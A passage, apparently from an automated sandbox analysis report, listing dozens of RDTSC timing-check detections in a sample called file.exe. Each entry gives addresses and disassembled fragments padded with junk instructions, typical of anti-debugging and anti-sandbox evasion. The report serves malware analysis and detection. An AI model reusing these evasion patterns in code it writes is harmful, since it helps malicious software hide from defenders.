mov bx, AA47h 0x00000067 xchg eax, esi 0x00000068 jo 00007F661CE75E94h 0x0000006e push eax 0x0000006f push edx 0x00000070 jnl 00007F661CE75E86h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D23E second address: A3D24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A402B9 second address: A402BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A402BF second address: A402C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4035E second address: A40362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A40362 second address: A40373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 jo 00007F661D45143Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4134A second address: A4134F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4134F second address: A41361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F661D451436h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42408 second address: A42437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F661CE75E8Ah 0x00000014 jmp 00007F661CE75E8Dh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A443CD second address: A443E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D451441h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4557A second address: A45580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45580 second address: A45584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48419 second address: A48439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48439 second address: A4843F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A465B1 second address: A465B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A445B4 second address: A445C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A445C2 second address: A44635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bx, B167h 0x0000000e mov dword ptr [ebp+1245780Bh], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movzx ebx, di 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 sub dword ptr [ebp+12469E52h], ecx 0x0000002b mov eax, dword ptr [ebp+122D1729h] 0x00000031 mov dword ptr [ebp+12480B20h], eax 0x00000037 movzx edi, ax 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007F661CE75E88h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 nop 0x0000005a pushad 0x0000005b jmp 00007F661CE75E8Eh 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A44635 second address: A4464B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F661D45143Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A485CF second address: A485DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A485DB second address: A4865E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F661D451438h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push ebx 0x00000029 xor ebx, 390F0FAEh 0x0000002f pop edi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov dword ptr [ebp+12469F33h], edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov dword ptr [ebp+122D295Eh], edi 0x0000004a mov eax, dword ptr [ebp+122D08E5h] 0x00000050 mov edi, edx 0x00000052 push FFFFFFFFh 0x00000054 call 00007F661D451446h 0x00000059 sub dword ptr [ebp+122D2A20h], ebx 0x0000005f pop edi 0x00000060 add bl, 00000030h 0x00000063 push eax 0x00000064 jg 00007F661D451448h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4865E second address: A48662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4A3E2 second address: A4A3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4A3EB second address: A4A3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B5E5 second address: A4B5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F661D451436h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B5F8 second address: A4B60A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53D95 second address: A53D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53D9B second address: A53D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53D9F second address: A53DCF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F661D45143Ch 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F661D451444h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53DCF second address: A53DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A53DD5 second address: A53DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5407C second address: A540BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F661CE75E95h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F661CE75E90h 0x00000013 pop esi 0x00000014 jmp 00007F661CE75E93h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A540BE second address: A540C8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F661D45143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A540C8 second address: A540D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jbe 00007F661CE75E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A594AC second address: A594C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D451440h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A595D7 second address: A595DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5967E second address: A59683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A59683 second address: A59696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A59696 second address: A5969A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5969A second address: A596C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F661CE75E92h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jng 00007F661CE75E92h 0x00000019 je 00007F661CE75E8Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FD05 second address: A5FD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FD09 second address: A5FD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5EAF4 second address: A5EB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F661D451441h 0x0000000c jmp 00007F661D45143Bh 0x00000011 pop edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 jp 00007F661D451436h 0x0000001a je 00007F661D451436h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F661D45143Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F0D6 second address: A5F0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F243 second address: A5F247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F77C second address: A5F785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F785 second address: A5F790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F661D451436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F790 second address: A5F796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8E5 second address: A5F8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8F0 second address: A5F8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8F4 second address: A5F8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F8F8 second address: A5F8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FA2C second address: A5FA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FA30 second address: A5FA52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E97h 0x00000007 pushad 0x00000008 jg 00007F661CE75E86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FB71 second address: A5FB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jbe 00007F661D451436h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62F66 second address: A62F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69191 second address: A691A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A67EFB second address: A67F57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E96h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 je 00007F661CE75EA5h 0x00000017 jmp 00007F661CE75E99h 0x0000001c je 00007F661CE75E86h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F661CE75E93h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D68F second address: A6D693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D693 second address: A6D699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D699 second address: A6D6B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451445h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DDB4 second address: A6DDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DDBA second address: A6DDC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DDC3 second address: A6DDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E1D2 second address: A6E1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E307 second address: A6E30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76DF5 second address: A76E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 jo 00007F661D451436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F661D451448h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76E28 second address: A76E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76E2E second address: A76E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76E32 second address: A76E43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F661CE75E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75C7D second address: A75C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75C89 second address: A75CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E93h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F661CE75E8Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31683 second address: A31687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31687 second address: A3168C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A318C1 second address: A318C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31CC9 second address: A31CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31EC7 second address: A31EF2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451438h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jnc 00007F661D451440h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31FDA second address: A31FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31FED second address: A32007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32007 second address: A3200C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76102 second address: A76124 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 jnl 00007F661D451436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F661D45143Eh 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76124 second address: A7612C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7612C second address: A7614D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D451444h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7614D second address: A76151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76151 second address: A76180 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F661D45144Eh 0x00000012 jmp 00007F661D451448h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76434 second address: A76454 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F661CE75E92h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76454 second address: A7646E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F661D451442h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76838 second address: A76840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76840 second address: A76846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76984 second address: A76993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F661CE75E86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76993 second address: A7699D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7699D second address: A769A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A769A1 second address: A769A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F77A7 second address: 9F77B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F661CE75E88h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F77B5 second address: 9F77E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F661D45143Fh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c ja 00007F661D451436h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F661D45143Ah 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440432 second address: 5440438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
